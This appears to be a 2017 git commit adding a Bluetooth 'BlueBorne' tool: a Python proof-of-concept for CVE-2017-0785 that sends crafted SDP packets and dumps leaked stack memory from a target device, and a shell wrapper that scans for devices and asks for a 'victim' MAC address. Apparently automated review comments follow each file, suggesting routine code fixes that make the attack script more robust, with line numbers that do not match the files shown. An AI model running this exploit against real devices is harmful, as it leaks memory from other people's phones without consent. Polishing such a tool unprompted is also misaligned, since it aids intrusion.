authorNavan Chauhan <navanchauhan@gmail.com>2017-10-02 21:10:16 +0530
committerNavan Chauhan <navanchauhan@gmail.com>2017-10-02 21:10:16 +0530
commit934254059fe6e75615747bf2cfcc4f52c07441e7 (patch)
tree1c35abefba4e23393106f28919abb485c7bd897b
Files Added
-rw-r--r--README.md1
-rw-r--r--main.py53
-rw-r--r--scanner.sh8
3 files changed, 62 insertions, 0 deletions
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..9831cc3
--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+# Blueborne-Vulnerability-Scanner
diff --git a/main.py b/main.py
new file mode 100644
index 0000000..9e861e7
--- /dev/null
+++ b/main.py
@@ -0,0 +1,53 @@
+from pwn import *
+import bluetooth
+
+if not 'TARGET' in args:
+ log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
+ exit()
+
+target = args['TARGET']
+service_long = 0x0100
+service_short = 0x0001
+mtu = 50
+n = 30
+
+def packet(service, continuation_state):
+ pkt = '\x02\x00\x00'
+ pkt += p16(7 + len(continuation_state))
+ pkt += '\x35\x03\x19'
+ pkt += p16(service)
+ pkt += '\x01\x00'
+ pkt += continuation_state
+ return pkt
+
+p = log.progress('Exploit')
+p.status('Creating L2CAP socket')
+
+sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
+bluetooth.set_l2cap_mtu(sock, mtu)
+context.endian = 'big'
+
+p.status('Connecting to target')
+sock.connect((target, 1))
+
+p.status('Sending packet 0')
+sock.send(packet(service_long, '\x00'))
+data = sock.recv(mtu)
+
+if data[-3] != '\x02':
+ log.error('Invalid continuation state received.')
+
+stack = ''
+
+for i in range(1, n):
+ p.status('Sending packet %d' % i)
+ sock.send(packet(service_short, data[-3:]))
+ data = sock.recv(mtu)
+ stack += data[9:-3]
+
+sock.close()
+
+p.success('Done')
+
+print hexdump(stack)
+
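Review bot: The usage message on line 32 names `CVE-2017-0785.py`, but the file this commit adds is `main.py` and scanner.sh invokes it as `python main.py`, so the hint a user gets back does not match the script they ran; change it to `log.info("Usage: main.py TARGET=XX:XX:XX:XX:XX:XX")`. The file also has no header saying what it is: a module docstring stating that this is a proof-of-concept for the CVE ID already in the usage string, that it only prints a hex dump of what it receives, and that it needs Python 2 (the `print hexdump(stack)` statement on the last line and the `str`-based `packet()` builder are not valid Python 3) would save a reader from working that out. `sock.close()` on line 75 runs only when every `send`/`recv` returned normally; wrapping the exchange from `sock.connect` onwards in `try: ... finally: sock.close()` would release the L2CAP socket on any error path as well.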
diff --git a/scanner.sh b/scanner.sh
new file mode 100644
index 0000000..485db04
--- /dev/null
+++ b/scanner.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+hcitool scan
+echo "Enter The Mac Adress of the desired victim"
+read targer
+clear
+echo "Scanning"
+clear
+python main.py TARGET=$targer
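Review bot: `$targer` on line 94 is expanded unquoted, so an entry containing spaces or glob characters is word-split before it reaches `main.py`; quote it, `python main.py TARGET="$targer"`, and rename the variable, which is a typo of `target` (the prompt on line 89 likewise misspells "Address"). The `clear` calls on lines 91 and 93 wipe the `hcitool scan` output and then the "Scanning" message immediately after they are printed, so the user sees neither; drop them or clear once before printing the message. Nothing checks that the value read on line 90 looks like an `XX:XX:XX:XX:XX:XX` address before it is handed on, so a mistyped entry presumably only surfaces as a connection failure inside main.py; a short pattern check with a clear message here would be friendlier, and `read -r` avoids backslash interpretation of the input.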